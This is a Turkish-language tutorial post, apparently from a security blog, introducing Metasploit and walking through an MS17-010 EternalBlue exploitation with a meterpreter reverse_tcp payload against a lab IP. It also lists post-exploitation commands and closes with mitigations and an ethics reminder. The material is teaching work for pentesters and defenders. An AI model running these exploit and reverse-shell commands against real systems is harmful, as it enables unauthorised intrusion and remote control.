Metasploit ile Pentest Çalışmaları: Temeller ve Örnek Senaryolar
1. Giriş
Siber güvenlik dünyasında saldırı tekniklerini anlamak ve sistemleri güvenli hale getirmek için penetrasyon testleri (pentest) büyük bir öneme sahiptir. Bu testlerin en yaygın kullanılan araçlarından biri Metasploit Framework (MSF)'dir. Metasploit, siber güvenlik uzmanlarının sistemlerdeki güvenlik açıklarını analiz etmesine, istismar etmesine ve zafiyetleri gidermek için çözümler üretmesine olanak tanır.
Bu makalede, Metasploit’in temellerini ele alacak, nasıl çalıştığını açıklayacak ve örnek bir pentest senaryosu üzerinden pratik bir uygulama yapacağız.
2. Metasploit Nedir?
Metasploit, açık kaynak kodlu bir penetrasyon testi framework’üdür ve Rapid7 tarafından geliştirilmiştir. İlk olarak 2003 yılında geliştirilmiş olup, zamanla en güçlü sızma testi araçlarından biri haline gelmiştir. Metasploit ile şu işlemler gerçekleştirilebilir:
- Güvenlik açıklarını tarama ve analiz etme
- Exploit (istismar) geliştirme ve çalıştırma
- Güvenlik duvarı ve antivirüs atlatma tekniklerini test etme
- Zafiyetlerin nasıl kapatılabileceğine dair öneriler sunma
Metasploit, hem komut satırı (CLI) hem de grafik arayüz (Armitage, Metasploit Pro) üzerinden kullanılabilir. Ancak, en yaygın kullanım şekli msfconsole ile komut satırından çalıştırılmasıdır.
3. Metasploit’in Temel Bileşenleri
Metasploit içinde birçok farklı modül ve bileşen barındırır. Bunların en önemlileri şunlardır:
- Exploit Modülleri: Hedef sistemdeki zafiyetleri kullanarak saldırılar gerçekleştiren modüllerdir.
- Payloads (Yükler): Exploit başarıyla çalıştığında, hedef sistemde çalıştırılacak kod veya komutlardır. (Örneğin, ters bağlantı almak için bir shell yükleme)
- Auxiliary Modüller: Bilgi toplama, tarama, brute-force saldırıları gibi destekleyici araçlardır.
- Post Exploitation Modülleri: Başarılı bir sızmadan sonra hedef sistem üzerinde yapılabilecek işlemleri içerir. (Örneğin, sistemde yetki yükseltme)
4. Metasploit Kurulumu ve Kullanımı
4.1. Metasploit’i Kurma
Metasploit’i kurmak için Kali Linux en uygun platformlardan biridir. Kali Linux’ta Metasploit genellikle ön yüklü gelir, ancak yoksa şu komutla yüklenebilir:
sudo apt update && sudo apt install metasploit-framework -y
Kurulum tamamlandıktan sonra Metasploit başlatılabilir:
msfconsole
Başarıyla çalıştırıldığında, Metasploit’in ana konsolu açılır ve komut satırından işlemler gerçekleştirilebilir.
4.2. Metasploit Kullanımına Başlangıç
Metasploit içinde belirli komutları kullanarak işlemler yapılır:
- exploit’leri listeleme:
search exploit windows
- bir exploit seçme:
use exploit/windows/smb/ms17_010_eternalblue
- payload seçme:
set payload windows/meterpreter/reverse_tcp
- hedef IP’yi belirleme:
set RHOSTS 192.168.1.10
- exploit’i çalıştırma:
exploit
5. Örnek Bir Pentest Senaryosu: Windows SMB Zafiyeti (MS17-010) Kullanarak Sızma
Şimdi, gerçek bir senaryo üzerinden Metasploit ile sızma testi gerçekleştirelim. Bu senaryoda, Windows işletim sistemine sahip bir hedef makinedeki SMB protokolü zafiyetini (MS17-010) kullanarak erişim sağlamayı deneyeceğiz.
5.1. Zafiyet Analizi ve Exploit Seçimi
Öncelikle, hedef sistemin SMB zafiyetine sahip olup olmadığını kontrol edelim. Metasploit içinde aşağıdaki komutlarla tarama yapabiliriz:
use auxiliary/scanner/smb/smb_ms17_010
set RHOSTS 192.168.1.10
run
Eğer sistemin MS17-010 zafiyetine sahip olduğu doğrulanırsa, exploit modülünü kullanabiliriz:
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.1.10
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.5 # Kali Linux’un IP’si
set LPORT 4444
exploit
5.2. Meterpreter ile Hedef Sistemde Kontrol Sağlama
Eğer exploit başarılı olursa, meterpreter>
kabuğuna düşeriz. Bu noktadan sonra, hedef sistem üzerinde işlemler yapabiliriz. Örneğin:
- Sistem bilgilerini öğrenme:
sysinfo
- Dosya sisteminde gezinme:
ls
,cd
- Ekran görüntüsü alma:
screenshot
- Arka planda kalma:
background
Bunlar, başarılı bir sızma sonrasında gerçekleştirilebilecek temel işlemlerdir.
6. Zafiyetin Kapatılması ve Güvenlik Önlemleri
Bir sistemin Metasploit gibi araçlarla ele geçirilmesini önlemek için şu önlemler alınmalıdır:
- Güncellemeleri düzenli yapmak: Microsoft’un yayınladığı güvenlik yamaları uygulanmalıdır.
- Güçlü şifreler kullanmak: Brute-force saldırılarına karşı sistem güvenliğini artırır.
- Güvenlik duvarı ve IDS/IPS kullanmak: Yetkisiz erişim girişimlerini engeller.
- SMB gibi güvenlik riski taşıyan protokolleri kapatmak veya güvenli hale getirmek.
7. Sonuç
Metasploit, siber güvenlik uzmanları ve etik hacker’lar için güçlü bir sızma testi aracıdır. Bu makalede, Metasploit’in temellerini, ana bileşenlerini ve nasıl kullanıldığını öğrendik. Ayrıca, MS17-010 SMB exploit’ini kullanarak bir pentest senaryosu gerçekleştirdik.
Gerçek dünyada sızma testleri yaparken etik kurallara uymak, yalnızca izin verilen sistemlerde testler yapmak ve yasal çerçevede hareket etmek büyük önem taşır. Metasploit ve benzeri araçlar, siber güvenlik dünyasında hem saldırganlar hem de savunmacılar tarafından kullanılabilir; bu yüzden, sistem yöneticileri ve güvenlik uzmanları bu tür araçları nasıl kullanacaklarını ve nasıl önlem alacaklarını bilmelidir.
Daha ileri düzey senaryolar için Metasploit post-exploitation teknikleri, Antivirüs atlatma yöntemleri ve sızma testi raporlaması gibi konulara da göz atabilirsin.
![]() |
Tekno Gen TR - Siber Güvenlik |
---
Bilgi:
![]() |
Ak.Web.TR |
Siber Güvenlik alanında uzmanlaşmak isteyenler, Ak.Web.TR Sitesini ziyaret edebilirler.
8. Kaynak: (TekNo.Gen.TR)
Bu doküman, platformumuzun uzman editörleri tarafından özenle hazırlanarak titizlikle derlenmiştir. İçerik, alanında deneyimli profesyonellerin katkılarıyla, en güncel bilgilere ve kaynaklara dayanarak oluşturulmuştur.
![]() |
Tekno Gen TR |